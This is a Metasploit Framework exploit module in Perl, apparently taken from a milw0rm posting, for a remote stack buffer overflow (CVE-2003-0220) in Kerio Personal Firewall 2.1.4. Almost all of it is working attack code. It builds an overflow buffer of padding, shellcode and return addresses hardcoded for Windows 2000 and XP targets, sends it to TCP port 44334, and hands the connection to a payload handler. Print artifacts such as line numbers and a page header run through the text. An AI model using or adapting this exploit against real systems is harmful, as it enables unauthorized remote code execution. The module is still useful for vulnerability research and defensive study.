##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::kerio_auth;
use strict;
use warnings;
use base "Msf::Exploit";
use Pex::Text;
     13
     14   my $advanced = { };
     15
     16   my $info =
     17     {
     18
     19          ’Name’ => ’Kerio Personal Firewall 2 (2.1.4) Remote Authentication Packet Buffer Overflow’,
     20          ’Version’ => ’$Revision: 1.1 $’,
     21          ’Authors’ => [ ’y0 [at] w00t−shell.net’, ],
     22          ’Arch’ => [ ’x86’ ],
     23          ’OS’      => [ ’win32’, ’win2000’, ’winxp’, ],
     24          ’Priv’ => 0,
     25          ’UserOpts’ => {
     26                    ’RHOST’ => [1, ’ADDR’, ’The target address’],
     27                    ’RPORT’ => [1, ’PORT’, ’The target port’, 44334],
     28                    ’SSL’     => [0, ’BOOL’, ’Use SSL’],
     29            },
     30          ’AutoOpts’ => { ’EXITFUNC’ => ’process’ },
     31          ’Payload’ => {
     32                    ’Space’       => 1000,
     33                    ’BadChars’ => "\x00",
     34                    ’Prepend’    => "\x81\xc4\x54\xf2\xff\xff",
     35                    ’Keys’        => [’−ws2ord’],
     36            },
     37
     38           ’Description’ => Pex::Text::Freeform(qq{
     39           This module exploits a stack overflow in Kerio Personal Firewall
     40   administration authentication process. This module has only been tested
     41   against Kerio Personal Firewall 2 2.1.4.
     42   }),
     43
     44           ’Refs’   => [
     45                     [’BID’, ’7180’],
     46                     [’CVE’, ’2003−0220’],
     47                     [’URL’, ’http://www1.corest.com/common/showdoc.php?idx=314&idxseccion=10’],
     48             ],
     49
     50          ’Targets’ => [
     51                    [’Windows 2000 Pro SP4 English’, 0x7c2ec68b],
     52                    [’Windows XP Pro SP0 English’,    0x77e3171b],
y0                                                                                                             02/28/2006
                         Kerio Personal Firewall 2.1.4 Remote Authentication Packet Overflow                           Page 2/3
     53                       [’Windows XP Pro SP1 English’,    0x77dc5527],
     54                  ],
     55
     56             ’Keys’ => [’firewall’],
     57
     58             ’DisclosureDate’ => ’Apr 28 2003’,
     59
     60        };
     61
     62    sub new {
     63            my $class = shift;
     64            my $self = $class−>SUPER::new({’Info’ => $info, ’Advanced’ => $advanced}, @_);
     65            return($self);
     66    }
     67
     68    sub Exploit
     69    {
     70            my    $self = shift;
     71            my    $target_host = $self−>GetVar(’RHOST’);
     72            my    $target_port = $self−>GetVar(’RPORT’);
     73            my    $target_idx = $self−>GetVar(’TARGET’);
     74            my    $shellcode   = $self−>GetVar(’EncodedPayload’)−>Payload;
     75            my    $target = $self−>Targets−>[$target_idx];
     76
     77             if (! $self−>InitNops(128)) {
     78                     $self−>PrintLine("[*] Failed to initialize the nop module.");
     79                     return;
     80             }
     81
     82             my $sploit =
     83               Pex::Text::AlphaNumText(4268). $shellcode.
     84               pack(’V’, $target−>[1]). "\xe9\x0b\xfe\xff\xff";
     85
     86             $self−>PrintLine(sprintf("[*] Trying to exploit target %s 0x%.8x", $target−>[0], $target−>[1]));
     87
     88             my $s = Msf::Socket::Tcp−>new
     89               (
     90                     ’PeerAddr’ => $target_host,
     91                     ’PeerPort’ => $target_port,
     92                     ’LocalPort’ => $self−>GetVar(’CPORT’),
     93                     ’SSL’         => $self−>GetVar(’SSL’),
     94               );
     95             if ($s−>IsError) {
     96                     $self−>PrintLine(’[*] Error creating socket: ’ . $s−>GetError);
     97                     return;
     98             }
     99
     100            $s−>Send($sploit);
     101            $self−>Handler($s);
     102            $s−>Close();
     103            return;
     104   }
     105
# A module loaded with use/require must evaluate to a true value.
1;

# milw0rm.com [2006-02-28]



